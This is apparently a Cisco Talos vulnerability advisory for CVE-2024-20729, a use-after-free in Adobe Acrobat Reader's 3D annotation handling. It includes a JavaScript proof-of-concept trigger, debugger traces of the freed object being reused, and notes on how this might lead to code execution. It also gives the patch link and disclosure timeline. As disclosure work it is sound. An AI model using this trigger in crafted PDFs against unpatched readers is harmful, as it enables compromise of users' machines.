CVE-2024-20729
A use-after-free vulnerability exists in the Annot3D functionality of Adobe Acrobat Reader 2023.006.20380. Specially crafted JavaScript inside a malicious PDF document can trigger reuse of a previously freed object, which leads to memory corruption and could result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.
Tested versions (either tested or verified to be vulnerable by Talos, or confirmed to be vulnerable by the vendor):
Adobe Acrobat Reader 2023.006.20380
Product URL: Acrobat Reader - https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html
CVSSv3 score: 8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-416 - Use After Free
Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is often the default PDF reader on a system. It also integrates into web browsers as a plugin for rendering PDFs.
Adobe's PDF Reader creates an Annot3D object when a page contains a 3D annotation. There exists a use-after-free vulnerability in the way Adobe Acrobat Reader handles that Annot3D object while document-level JavaScript is allowed to run in the middle of a native call. This can be illustrated by the following proof-of-concept code (comments added for this write-up):
function main() {
  main_run++;
  // t carries a toString callback; it fires when the native call below coerces t to a primitive
  t = {toString:set_page} ;
  app.activeDocs[0].getField('Text Field1').setFocus();
  app.activeDocs[0].getPageNthWordQuads(0, t);
}
function set_page() {
  // runs from inside getPageNthWordQuads and switches the document to another page
  app.activeDocs[0].pageNum = 4;
}
[..]
function zoomtype() {
  // the zoom change tears down page objects, including the Annot3D the native caller still holds
  app.activeDocs[0].zoomType = zoomtype.fitV;
}
In the above excerpt, the toString property of the object t is set to the callback function set_page. The callback fires when getPageNthWordQuads coerces its second argument to a primitive: t has no valueOf that returns a primitive, so its toString is invoked and script runs while the native call is still in progress. set_page switches the document to page 4, and that page change in turn runs the zoomtype function (the connecting code is elided in the excerpt), which changes the document's zoom type. Handling the zoom change frees a number of objects, including the Annot3D object, even though the native code that started the call still holds a pointer to it. The use-after-free occurs when that freed Annot3D object is later used without any validation. We can observe the following in the debugger (with PageHeap enabled):
eax=0fd60f00 ebx=0536d9d4 ecx=00000001 edx=07ca0000 esi=c0010000 edi=00000012
eip=6ebd2f79 esp=0536d8d4 ebp=0536d9c8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!CTJPEGReader::operator=+0x2d6d9:
6ebd2f79 68b8010000 push 1B8h
0:000> p
eax=0fd60f00 ebx=0536d9d4 ecx=00000001 edx=07ca0000 esi=c0010000 edi=00000012
eip=6ebd2f7e esp=0536d8d0 ebp=0536d9c8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!CTJPEGReader::operator=+0x2d6de:
6ebd2f7e e80944e4ff call AcroRd32!AcroWinMainSandbox+0x4abc (6ea1738c) ; <--------- (1)
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=00000001 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f83 esp=0536d8d0 ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6e3:
6ebd2f83 59 pop ecx
0:000> dd eax ; <--------- (2)
bb502e48 00000000 00000000 00000000 00000000
bb502e58 00000000 00000000 00000000 00000000
bb502e68 00000000 00000000 00000000 00000000
bb502e78 00000000 00000000 00000000 00000000
bb502e88 00000000 00000000 00000000 00000000
bb502e98 00000000 00000000 00000000 00000000
bb502ea8 00000000 00000000 00000000 00000000
bb502eb8 00000000 00000000 00000000 00000000
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=000001b8 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f84 esp=0536d8d4 ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6e4:
6ebd2f84 59 pop ecx
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=00000001 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f85 esp=0536d8d8 ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6e5:
6ebd2f85 8bc8 mov ecx,eax
[...]
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f98 esp=0536d8d4 ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6f8:
6ebd2f98 ff7010 push dword ptr [eax+10h] ds:002b:852e0f70=8dc44eb0
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f9b esp=0536d8d0 ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6fb:
6ebd2f9b 57 push edi
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f9c esp=0536d8cc ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6fc:
6ebd2f9c 56 push esi
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f9d esp=0536d8c8 ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6fd:
6ebd2f9d e86588c500 call AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc037 (6f82b807) ; <----- (3)
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=6f82ba18 edx=07ca0000 esi=c0010000 edi=00000012
eip=6ebd2fa2 esp=0536d8d8 ebp=0536d9c8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!CTJPEGReader::operator=+0x2d702:
6ebd2fa2 eb65 jmp AcroRd32!CTJPEGReader::operator=+0x2d769 (6ebd3009)
0:000> dd bb502e48 ; <----- (4)
bb502e48 7043e3c8 00000000 00000000 ffffffff
bb502e58 00000000 00000000 00000000 00000000
bb502e68 00000000 00000000 00000000 00000000
bb502e78 00000000 00000000 00000000 00000002
bb502e88 8dc44eb0 bb508ff8 00000027 00000000
bb502e98 702da7e8 bb514fe8 00000000 00000000
bb502ea8 00000000 00000000 00000000 00000000
bb502eb8 00000000 00000000 00000000 00000000
At (1) above, a function is called which calls malloc to allocate an Annot3D object of size 0x1B8 (the value pushed as the argument just before the call). At (2) the freshly allocated buffer is still zero-filled. The Annot3D object is initialized by the call at (3), and (4) shows the buffer contents after initialization.
0:000> u
AcroRd32!AIDE::PixelPartInfo::operator=+0x50432b:
6f833afb 8b8bbc000000 mov ecx,dword ptr [ebx+0BCh] <------------------- (5)
6f833b01 0fb7f0 movzx esi,ax
6f833b04 33c0 xor eax,eax
6f833b06 50 push eax
6f833b07 e82d4444ff call AcroRd32!CTJPEGReader::operator=+0xd2699 (6ec77f39)
6f833b0c 8b8bbc000000 mov ecx,dword ptr [ebx+0BCh]
6f833b12 33c0 xor eax,eax
6f833b14 85c9 test ecx,ecx
0:000> p
eax=00000001 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000000 edi=00000001
eip=6f833b01 esp=0536d660 ebp=0536d67c iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x504331:
6f833b01 0fb7f0 movzx esi,ax
0:000> p
eax=00000001 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000001 edi=00000001
eip=6f833b04 esp=0536d660 ebp=0536d67c iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x504334:
6f833b04 33c0 xor eax,eax
0:000> p
eax=00000000 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000001 edi=00000001
eip=6f833b06 esp=0536d660 ebp=0536d67c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x504336:
6f833b06 50 push eax
0:000> p
eax=00000000 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000001 edi=00000001
eip=6f833b07 esp=0536d65c ebp=0536d67c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x504337:
6f833b07 e82d4444ff call AcroRd32!CTJPEGReader::operator=+0xd2699 (6ec77f39) <--------------- [6]
[...]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be4a esp=0536d280 ebp=0536d294 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc67a:
6f82be4a f6450801 test byte ptr [ebp+8],1 ss:002b:0536d29c=01
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be4e esp=0536d280 ebp=0536d294 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc67e:
6f82be4e 7423 je AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc6a3 (6f82be73) [br=0]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be50 esp=0536d280 ebp=0536d294 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc680:
6f82be50 f6450804 test byte ptr [ebp+8],4 ss:002b:0536d29c=01
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be54 esp=0536d280 ebp=0536d294 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc684:
6f82be54 7510 jne AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc696 (6f82be66) [br=0]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be56 esp=0536d280 ebp=0536d294 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc686:
6f82be56 8365fc00 and dword ptr [ebp-4],0 ss:002b:0536d290=ffffffff
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5a esp=0536d280 ebp=0536d294 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68a:
6f82be5a 85f6 test esi,esi
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5c esp=0536d280 ebp=0536d294 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68c:
6f82be5c 7415 je AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc6a3 (6f82be73) [br=0]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5e esp=0536d280 ebp=0536d294 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68e:
6f82be5e 56 push esi <----------------------------------- [7]
0:000> dd esi
bb502e48 70169d20 00000000 00000000 ffffffff
bb502e58 00000000 00000000 00000000 00000006
bb502e68 00000002 00000008 00000001 00000001
bb502e78 00000000 00000000 00000000 00000002
bb502e88 8dc44eb0 bb508ff8 00000027 00000000
bb502e98 70169d20 bb514fe8 00000000 00000000
bb502ea8 00000000 00000000 00000000 00000000
bb502eb8 00000000 00000000 00000000 00000000
0:000> t
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5f esp=0536d27c ebp=0536d294 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68f:
6f82be5f e81cec1eff call AcroRd32!AcroWinMainSandbox+0x81b0 (6ea1aa80)
0:000> t
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6ea1aa80 esp=0536d278 ebp=0536d294 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AcroWinMainSandbox+0x81b0:
6ea1aa80 55 push ebp
0:000> pc
eax=70d0283c ebx=852e0f60 ecx=76dc3c50 edx=07ca0000 esi=76dc3c50 edi=bb502e48
eip=6ea1aa91 esp=0536d26c ebp=0536d274 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AcroWinMainSandbox+0x81c1:
6ea1aa91 ff15a8471170 call dword ptr [AcroRd32!AcroSecurityBailOutImpl+0x32fa88 (701147a8)] ds:002b:701147a8={ntdll!LdrpValidateUserCallTarget (77a988f0)}
0:000> pc
eax=0edb878a ebx=852e0f60 ecx=76dc3c50 edx=00810400 esi=76dc3c50 edi=bb502e48
eip=6ea1aa97 esp=0536d26c ebp=0536d274 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000247
AcroRd32!AcroWinMainSandbox+0x81c7:
6ea1aa97 ffd6 call esi {ucrtbase!free (76dc3c50)} <------------------------------ [8]
0:000> dd bb502e48 <------------------------------ [9]
bb502e48 70169d20 00000000 00000000 ffffffff
bb502e58 00000000 00000000 00000000 00000006
bb502e68 00000002 00000008 00000001 00000001
bb502e78 00000000 00000000 00000000 00000002
bb502e88 8dc44eb0 bb508ff8 00000027 00000000
bb502e98 70169d20 bb514fe8 00000000 00000000
bb502ea8 00000000 00000000 00000000 00000000
bb502eb8 00000000 00000000 00000000 00000000
0:000> p
eax=00000001 ebx=852e0f60 ecx=07ca0000 edx=07ca0000 esi=76dc3c50 edi=bb502e48
eip=6ea1aa99 esp=0536d26c ebp=0536d274 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
AcroRd32!AcroWinMainSandbox+0x81c9:
6ea1aa99 59 pop ecx
0:000> dd bb502e48 <------------------------------ [10]
bb502e48 ???????? ???????? ???????? ????????
bb502e58 ???????? ???????? ???????? ????????
bb502e68 ???????? ???????? ???????? ????????
bb502e78 ???????? ???????? ???????? ????????
bb502e88 ???????? ???????? ???????? ????????
bb502e98 ???????? ???????? ???????? ????????
bb502ea8 ???????? ???????? ???????? ????????
bb502eb8 ???????? ???????? ???????? ????????
0:000> pt
eax=00000001 ebx=852e0f60 ecx=bb502e48 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6ea1aa9c esp=0536d278 ebp=0536d294 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
AcroRd32!AcroWinMainSandbox+0x81cc:
6ea1aa9c c3 ret
At [5] above, the ebx register holds the pointer to the vulnerable Annot3D buffer (bb502e48). The method called at [6] eventually reaches the call to free at [8]; the argument to free is the value pushed from esi at [7], which is that same buffer. [9] shows the buffer contents immediately before free is called and [10] shows them immediately afterwards: with PageHeap enabled the freed block is no longer accessible, which is why the debugger prints ???????? for it. The freed buffer is later used without any validation. This can be observed in a debugger at the time of the crash:
0:000> g
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=bb502e48 ecx=6ec7801f edx=00010000 esi=00000001 edi=00000001
eip=6f833b0c esp=0536d660 ebp=0536d67c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
AcroRd32!AIDE::PixelPartInfo::operator=+0x50433c:
6f833b0c 8b8bbc000000 mov ecx,dword ptr [ebx+0BCh] ds:002b:bb502f04=????????
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0536d67c 6ebe9a42 8dc44eb0 00000009 bb502e48 AcroRd32!AIDE::PixelPartInfo::operator=+0x50433c
01 0536dbb4 6ebd22e6 8dc44eb0 00000009 a1c24494 AcroRd32!CTJPEGReader::operator=+0x441a2
02 0536dbf4 6f479f3e 8dc44eb0 00000001 6f479ea0 AcroRd32!CTJPEGReader::operator=+0x2ca46
03 0536dc1c 6ea8a20e 0536dcfc 8dc44eb0 0536dc98 AcroRd32!AIDE::PixelPartInfo::operator=+0x14a76e
04 0536dc2c 6ebcde76 00000000 0000088c a1c243f8 AcroRd32!DllCanUnloadNow+0x3f5ee
05 0536dc98 6ebc8745 0536dcfc a1c24240 8dc44eb0 AcroRd32!CTJPEGReader::operator=+0x285d6
06 0536dd20 6ebc8577 00000000 0536dd6c 8cef6f48 AcroRd32!CTJPEGReader::operator=+0x22ea5
07 0536dd34 6ec7bb5b 8dc44eb0 00000000 8cef6f48 AcroRd32!CTJPEGReader::operator=+0x22cd7
08 0536dd50 6ecb7a3a 8cef6f48 a1c242c4 8cef6f48 AcroRd32!CTJPEGReader::operator=+0xd62bb
09 0536dda4 6ecb7493 00000000 8cef6f48 00000000 AcroRd32!CTJPEGReader::operator=+0x11219a
0a 0536ddf8 6ebd5b86 00000001 a1c241c0 00000000 AcroRd32!CTJPEGReader::operator=+0x111bf3
0b 0536dea0 6ebc7d73 00000001 00000001 00000000 AcroRd32!CTJPEGReader::operator=+0x302e6
0c 0536def8 6ebd2544 00000000 6ebd2520 6ebd2510 AcroRd32!CTJPEGReader::operator=+0x224d3
0d 0536df14 6ebd104b 8dc44eb0 a1c240b8 8dc44eb0 AcroRd32!CTJPEGReader::operator=+0x2cca4
0e 0536dfd8 6ebd0934 00000001 6ebd0934 00000004 AcroRd32!CTJPEGReader::operator=+0x2b7ab
0f 0536dffc 8f445c90 8dc44eb0 00000004 000001ac AcroRd32!CTJPEGReader::operator=+0x2b094
10 0536e040 8f3fb0bb 8130cfb8 4e1ecff0 506b2ff0 EScript!PlugInMain+0x56820
11 0536e0ac 8f2e2009 8fc78000 0536e20c 0536e0cc EScript!PlugInMain+0xbc4b
12 0536e0f4 8f2b6ba1 8fc78000 0536e20c 0536e20c EScript!mozilla::HashBytes+0x36f99
13 0536e140 8f2b650b 8fc78000 0536e20c 0536e20c EScript!mozilla::HashBytes+0xbb31
14 0536e1e4 8f2dce6b 8fc78000 0536e20c 0536e20c EScript!mozilla::HashBytes+0xb49b
15 0536e224 8f2d5521 8fc78000 0536e264 8fccc4ce EScript!mozilla::HashBytes+0x31dfb
16 0536e3fc 8f2d372e 00000000 718baa1e 0536e404 EScript!mozilla::HashBytes+0x2a4b1
17 0536e428 8f2d368f 8fc78000 0536e438 8f4d2d98 EScript!mozilla::HashBytes+0x286be
18 0536e484 8f2d3503 8fc78000 0536e4ec 90129a10 EScript!mozilla::HashBytes+0x2861f
19 0536e4c0 8f2b8713 8fc78000 0536e4ec 90129a10 EScript!mozilla::HashBytes+0x28493
1a 0536e510 8f2f18bb 8fc78000 0536e558 00000000 EScript!mozilla::HashBytes+0xd6a3
1b 0536e594 8f40aebb 8fc78000 90129a10 8fc780c0 EScript!mozilla::HashBytes+0x4684b
1c 0536e748 8f40ab14 3fc0cff0 ce18efe0 509bcff0 EScript!PlugInMain+0x1ba4b
1d 0536e794 8f4098f3 3d170fc0 8130cfb8 dc4f0f40 EScript!PlugInMain+0x1b6a4
1e 0536e834 8f47671f 55c8ebc0 8130cfb8 d92def00 EScript!PlugInMain+0x1a483
1f 0536e894 6f35e120 00000000 c0010000 0000000c EScript!PlugInMain+0x872af
20 0536e92c 6f358e03 7a84ecf0 c0010000 0000000c AcroRd32!AIDE::PixelPartInfo::operator=+0x2e950
21 0536e97c 6f096fd7 c0010000 0000000c 0536ea28 AcroRd32!AIDE::PixelPartInfo::operator=+0x29633
22 0536e9ac 6f09754a c0010000 0000000c 6f358db0 AcroRd32!ixVectorNextHit+0x16c767
23 0536ea00 6f35dd9c c0010000 0000000c 6f358db0 AcroRd32!ixVectorNextHit+0x16ccda
24 0536eab0 6ec69998 7a84ecf0 c0010000 0000000c AcroRd32!AIDE::PixelPartInfo::operator=+0x2e5cc
25 0536eb48 6ec697bf 00000060 00000001 6ec697bf AcroRd32!CTJPEGReader::operator=+0xc40f8
26 0536eb68 6ec69741 8dc44eb0 00000001 2aa4af10 AcroRd32!CTJPEGReader::operator=+0xc3f1f
27 0536eb88 6ea970c6 6063cff8 a1c27480 2aa4af50 AcroRd32!CTJPEGReader::operator=+0xc3ea1
28 0536ebe0 6ea95cdf 004aafb2 a1c27318 1d3d3fd0 AcroRd32!DllCanUnloadNow+0x4c4a6
29 0536ec78 6ea9518a 004aafb2 6ea94f77 a1c273b0 AcroRd32!DllCanUnloadNow+0x4b0bf
2a 0536ecd0 6ea1d784 000004d3 00000000 00000113 AcroRd32!DllCanUnloadNow+0x4a56a
2b 0536ecec 75fb0eab 00060130 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0xaeb4
2c 0536ed18 75fa7e5a 6ea1d280 00060130 00000113 USER32!_InternalCallWinProc+0x2b
2d 0536edfc 75fa5bca 6ea1d280 00000000 00000113 USER32!UserCallWinProcCheckWow+0x33a
2e 0536ee70 75fa5990 00000013 0536ee94 6ea94773 USER32!DispatchMessageWorker+0x22a
2f 0536ee7c 6ea94773 0536eeb0 1d3bdda8 1d3bdda8 USER32!DispatchMessageW+0x10
30 0536ee94 6ea9445e 0536eeb0 a1c27068 1d3bdda8 AcroRd32!DllCanUnloadNow+0x49b53
31 0536ef08 6ea94289 a1c27020 1d3bdda8 00000000 AcroRd32!DllCanUnloadNow+0x4983e
32 0536ef40 6ea13043 a1c270d4 0d466ff8 00000000 AcroRd32!DllCanUnloadNow+0x49669
33 0536efb4 6ea12a5f 6e870000 00af0000 0d466ff8 AcroRd32!AcroWinMainSandbox+0x773
34 0536f3d8 00cd59d0 6e870000 00af0000 0d466ff8 AcroRd32!AcroWinMainSandbox+0x18f
35 0536f78c 00d21efa 00af0000 00000000 07cc0018 AcroRd32_exe!IsSandboxedProcess+0x126030
36 0536f7d8 76eefcc9 05004000 76eefcb0 0536f844 AcroRd32_exe!AcroRd32IsBrokerProcess+0x1d54a
37 0536f7e8 77a77c6e 05004000 d8baf044 00000000 KERNEL32!BaseThreadInitThunk+0x19
38 0536f844 77a77c3e ffffffff 77a98c32 00000000 ntdll!__RtlUserThreadStart+0x2f
39 0536f854 00000000 00cd1640 05004000 00000000 ntdll!_RtlUserThreadStart+0x1b
In the above debugger output, the crash occurs at 6f833b0c, the instruction directly after the call at [6] returns: ebx still holds the stale pointer bb502e48, and it is dereferenced as if it were a live object pointer to read the field at offset 0xBC. With PageHeap enabled the freed block is unmapped, so this read faults immediately; in a normal process the memory would instead be recycled by the allocator, and the read would return whatever data happens to occupy it, including data placed there by the attacker's script. Depending on the memory layout of the process, it may therefore be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
The vendor released a security bulletin at: https://helpx.adobe.com/security/products/acrobat/apsb24-07.html. Patches can be found linked from this site.
2023-12-19 - Vendor Disclosure
2024-02-13 - Vendor Patch Release
2024-02-15 - Public Release
Discovered by KPC of Cisco Talos.